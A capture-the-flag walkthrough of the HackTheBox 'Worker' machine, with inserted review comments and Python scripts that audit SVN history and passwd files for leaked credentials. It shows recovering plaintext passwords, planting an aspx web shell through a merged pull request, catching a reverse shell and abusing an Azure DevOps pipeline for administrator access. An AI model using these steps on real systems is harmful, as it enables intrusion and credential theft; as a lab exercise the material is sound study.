WORKER HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 17:11 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating Ping Scan at 17:11
Scanning 10.10.10.203 [4 ports]
Completed Ping Scan at 17:11, 0.44s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:11
Scanning alpha.worker.htb (10.10.10.203) [1000 ports]
Discovered open port 80/tcp on 10.10.10.203
Discovered open port 3690/tcp on 10.10.10.203
Completed SYN Stealth Scan at 17:11, 25.11s elapsed (1000 total ports)
Initiating Service scan at 17:11
Scanning 2 services on alpha.worker.htb (10.10.10.203)
Completed Service scan at 17:11, 6.86s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against alpha.worker.htb (10.10.10.203)
Retrying OS detection (try #2) against alpha.worker.htb (10.10.10.203)
Initiating Traceroute at 17:11
Completed Traceroute at 17:11, 0.52s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 17:11
Completed Parallel DNS resolution of 2 hosts. at 17:11, 0.25s elapsed
NSE: Script scanning 10.10.10.203.
Initiating NSE at 17:11
Completed NSE at 17:11, 7.69s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 1.84s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Nmap scan report for alpha.worker.htb (10.10.10.203)
Host is up (0.43s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Alpha by HTML5 UP
3690/tcp open  svnserve Subversion
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   507.46 ms 10.10.14.1
2   507.71 ms alpha.worker.htb (10.10.10.203)

NSE: Script Post-scanning.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.67 seconds
           Raw packets sent: 2097 (95.952KB) | Rcvd: 49 (3.178KB)

PORT 80

Here we have nothing but IIS serving a static site, so nothing of interest yet.

SVN ENUMERATION

As we can see, port 3690 is open, which is the svn (Subversion) port, so let's dig into it and enumerate the repository.

First, svn is similar to git: just as we use git commands to clone and push repos, we can do the same with svn, only with different keywords.

https://backlog.com/git-tutorial/reference/commands/

https://www.perforce.com/blog/vcs/svn-commands-cheat-sheet

The links above will help you with the commands needed to clone a repo.

So let's clone with the basic command:

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #svn checkout svn://10.10.10.203
Restored 'dimension.worker.htb'
Restored 'dimension.worker.htb/images'
Restored 'dimension.worker.htb/images/pic03.jpg'
Restored 'dimension.worker.htb/images/overlay.png'
Restored 'dimension.worker.htb/images/bg.jpg'

<-------->

'dimension.worker.htb/assets/sass/libs/_breakpoints.scss'
Checked out revision 5.

Above we have cloned the repo, and after enumerating it we found only a subdomain, dimension.worker.htb.

Now we will check out another revision.

What is a revision? Every commit to the repo gets a number: the freshly created repo is revision 0, the first commit is revision 1, the next one is revision 2, and so on, so older revisions can contain files that are gone from the latest one.

So let's see how it works:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/worker/dimension]
└──╼ #svn checkout -r 2 svn://10.10.10.203
A    deploy.ps1
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js

<------>

Here we can see some more files that were not there in the latest revision, so let's check them:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/worker/dimension]
└──╼ #cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
┌─[root@liquid]─[~/Desktop/HTB/worker/dimension]

Here we got some credentials:

$user = "nathen"
$plain = "wendel98"

Another way to dig between revisions is the diff command.

Diff against revision 1:

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #svn diff -r 1
Index: moved.txt
===================================================================
--- moved.txt	(nonexistent)
+++ moved.txt	(revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team 🙂
+
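Review bot: the migration notice added in this hunk discloses the new hosting location http://devops.worker.htb inside a repository that the checkout above reached without any credentials, so the notice itself hands out the location of the replacement service to anyone who can read the old one; also "maintaned" on the first added line should read "maintained".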

Diff against revision 2:

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #svn diff -r 2
Index: deploy.ps1
===================================================================
--- deploy.ps1	(revision 2)
+++ deploy.ps1	(nonexistent)
@@ -1,6 +0,0 @@
-$user = "nathen" 
-$plain = "wendel98"
-$pwd = ($plain | ConvertTo-SecureString)
-$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
-$args = "Copy-Site.ps1"
-Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
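Review bot: the removed deploy.ps1 hard-codes a plaintext password in `$plain = "wendel98"` right next to its username, and deleting the file in a later revision does not remove it from history (the `svn checkout -r 2` and `svn diff -r 2` output on this page recover it intact), so the credential has to be rotated and supplied from outside the repository rather than just deleted. Separately, `$plain | ConvertTo-SecureString` without `-AsPlainText -Force` expects an encrypted standard string rather than a plaintext password, and `$args` and `$pwd` shadow PowerShell automatic variables.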
Index: moved.txt
===================================================================
--- moved.txt	(nonexistent)
+++ moved.txt	(revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team 🙂
+

Here we can clearly see that a file named deploy.ps1 existed at revision 2 and was removed later, while moved.txt points us to http://devops.worker.htb.
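As an added example (not part of the original writeup), the following Python audit mirrors what the svn diff above exposes from the defender's side: it walks an `svn log -v --xml` history, finds files that were deleted in a later revision, and scans their last surviving content for hard-coded credentials. The log XML and file contents are constructed samples; in practice they come from `svn log -v --xml` and `svn cat -r`.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of `svn log -v --xml` output shaped like the history the
# writeup walks through: deploy.ps1 is added at r2 and deleted at r3, and the
# migration notice moved.txt is added at r5.
SVN_LOG_XML = """<log>
<logentry revision="2"><author>nathen</author>
<paths><path action="A" kind="file">/deploy.ps1</path></paths>
<msg>Add deploy script</msg></logentry>
<logentry revision="3"><author>nathen</author>
<paths><path action="D" kind="file">/deploy.ps1</path></paths>
<msg>Remove deploy script</msg></logentry>
<logentry revision="5"><author>nathen</author>
<paths><path action="A" kind="file">/moved.txt</path></paths>
<msg>Migrated</msg></logentry>
</log>"""

# Constructed contents keyed by (revision, path); in practice each entry is
# fetched with `svn cat -r <rev> <url>/<path>`.
HISTORICAL_CONTENT = {
    (2, "/deploy.ps1"): '$user = "nathen"\n$plain = "wendel98"\n'
                        '$pwd = ($plain | ConvertTo-SecureString)\n',
}

# Patterns for hard-coded credentials in PowerShell and config style files.
SECRET_PATTERNS = [
    re.compile(r'\$(?:plain|pass(?:word)?|pwd)\s*=\s*"([^"]+)"', re.I),
    re.compile(r'password\s*[=:]\s*(\S+)', re.I),
]

def deleted_paths(log_xml):
    """Return {path: last revision where the file still existed} for every
    path that a later revision deleted."""
    last_seen, deleted = {}, {}
    for entry in ET.fromstring(log_xml).iter("logentry"):
        rev = int(entry.get("revision"))
        for p in entry.iter("path"):
            if p.get("action") == "D":
                deleted[p.text] = last_seen.get(p.text, rev - 1)
            else:
                last_seen[p.text] = rev
    return deleted

def find_leaked_secrets(log_xml, contents):
    """Scan the last revision of every deleted file for credential patterns
    and return (revision, path, secret) for each hit."""
    hits = []
    for path, rev in deleted_paths(log_xml).items():
        text = contents.get((rev, path), "")
        for pat in SECRET_PATTERNS:
            hits.extend((rev, path, m.group(1)) for m in pat.finditer(text))
    return hits
```

A hit means the secret is still recoverable from history and must be rotated; deleting the file again changes nothing.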

Let's use those credentials to log in to devops.worker.htb.

DEVOPS.WORKER.HTB

nathen:wendel98

Here we can see that we have access to a number of websites, so let's upload a shell to one of the sites and trigger it by visiting that site.

The shell we will be uploading is an aspx web shell:

https://github.com/puckiestyle/aspx/blob/master/InsomniaShell.aspx

So let's upload it.

To upload it we need to follow the instructions, as we cannot directly upload into the master branch; we need to create a branch first.

Just click on Branches and create a new one.

After that, upload the shell to it by clicking on your branch.

Then you will have a "Create a pull request" option; just click that.

Then click on Create.

Then click on Approve and then Complete (both buttons are side by side).

Then complete the merge.

You are done!

After a few seconds, go and access your shell and create a reverse shell.

You will get a shell like this:

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #rlwrap nc -lnvp 9008
listening on [any] 9008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.203] 52441
Shell enroute.......
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>powershell.exe
powershell.exe
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

After enumerating, I came to know that I have no access to anything, so let's get all drives:

PS C:\> Get-Volume
Get-Volume

DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining    Size
----------- ------------ -------------- --------- ------------ ----------------- -------------    ----
C                        NTFS           Fixed     Healthy      OK                      9.65 GB 29.4 GB
W           Work         NTFS           Fixed     Healthy      OK                     17.06 GB   20 GB
            Recovery     NTFS           Fixed     Healthy      OK                    118.04 MB  499 MB


So let's get into W:\

PS W:\> ls
ls


    Directory: W:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-16     18:59                agents                                                                
d-----       2020-03-28     14:57                AzureDevOpsData                                                       
d-----       2020-04-03     11:31                sites                                                                 
d-----       2020-06-20     16:04                svnrepos     
PS W:\> cd svnrepos
cd svnrepos
PS W:\svnrepos> ls
ls


    Directory: W:\svnrepos


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-20     11:29                www                                                                   


PS W:\svnrepos> cd www
cls
d www
PS W:\svnrepos\www> ls


    Directory: W:\svnrepos\www


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-20     15:30                conf                                                                  
d-----       2020-06-20     15:52                db                                                                    
d-----       2020-06-20     11:29                hooks                                                                 
d-----       2020-06-20     11:29                locks                                                                 
-ar---       2020-06-20     11:29              2 format                                                                
-a----       2020-06-20     11:29            251 README.txt                                                            

PS W:\svnrepos\www> cd conf
cd conf
PS W:\svnrepos\www\conf> ls
ls


    Directory: W:\svnrepos\www\conf


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       2020-06-20     11:29           1112 authz                                                                 
-a----       2020-06-20     11:29            904 hooks-env.tmpl                                                        
-a----       2020-06-20     15:27           1031 passwd                                                                
-a----       2020-04-04     20:51           4454 svnserve.conf                                                         


PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
<----->

Here we got a number of passwords, but we need valid ones. If you remember, we had a user named robisl, so let's grab his password:

robisl = wolves11
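An added example (not from the writeup) that audits an svnserve passwd file like the one read above: it keeps duplicate entries that a strict configparser would reject, reports usernames listed twice (nichin above), flags passwords that also appear in credentials recovered elsewhere (nathen's deploy.ps1 password), and counts how many plaintext secrets the file hands to anyone who can read it. The file content and the known-credential set are constructed samples.

```python
# Constructed sample of an svnserve conf/passwd file, shaped like the one the
# writeup reads from W:\svnrepos\www\conf; real input is that file's text.
PASSWD_FILE = """### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
robisl = wolves11
"""

# Credentials recovered from another source (here the pair hard-coded in the
# repository's deleted deploy.ps1), used to detect cross-system reuse.
KNOWN_CREDS = {("nathen", "wendel98")}

def parse_passwd(text):
    """Return (user, password) pairs from the [users] section in file order,
    keeping duplicates so that they can be reported."""
    pairs, in_users = [], False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("["):
            in_users = line.lower() == "[users]"
            continue
        if in_users and "=" in line:
            user, _, pw = line.partition("=")
            pairs.append((user.strip(), pw.strip()))
    return pairs

def audit_passwd(text, known_creds):
    """Report usernames defined more than once (ambiguous which password is
    active), passwords reused from other systems, and the number of distinct
    accounts whose plaintext password the file exposes."""
    seen, duplicates, reused = {}, [], []
    for user, pw in parse_passwd(text):
        if user in seen and user not in duplicates:
            duplicates.append(user)
        seen[user] = pw
        if (user, pw) in known_creds and user not in reused:
            reused.append(user)
    return {"duplicates": duplicates, "reused": reused,
            "plaintext_count": len(seen)}
```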

So let's use evil-winrm with it.

USER ACCESS

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #evil-winrm -u robisl -p wolves11 -i 10.10.10.203

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls


    Directory: C:\Users\robisl\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/22/2020   7:39 AM             34 user.txt


*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
16dfdc02fa843b51362d885c28d53a6d

Here we go with the user flag!

Now it is time to go for Administrator.

ADMINISTRATOR ACCESS

After checking the files we see that we have no access to any privileged file.

So let's use these creds on devops.worker.htb, and we will get in.

Here we go. So let's check if we have any repo.

As you can see, we have no repo for the website, but we can create a pipeline.

So let's create a new one.

Instructions to follow:

Create a new pipeline.

Click Azure Repos Git.

Then click PartsUnlimited.

If you scroll down you will see Starter Pipeline; just click on that.

Remove everything and paste this:

steps:
- script: whoami /all
  displayName: 'Run a one-line script'

Then save and run; then create a new branch by giving it a random name and save and run again.

Here you can see that we are administrator.

So let's get the root flag.

Just create a new pipeline again and follow the above steps, but paste this code instead:

steps:
- script: type c:\Users\Administrator\Desktop\root.txt
  displayName: 'Run a one-line script'

Just wait and get your root flag.

So here you go with the root flag!

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
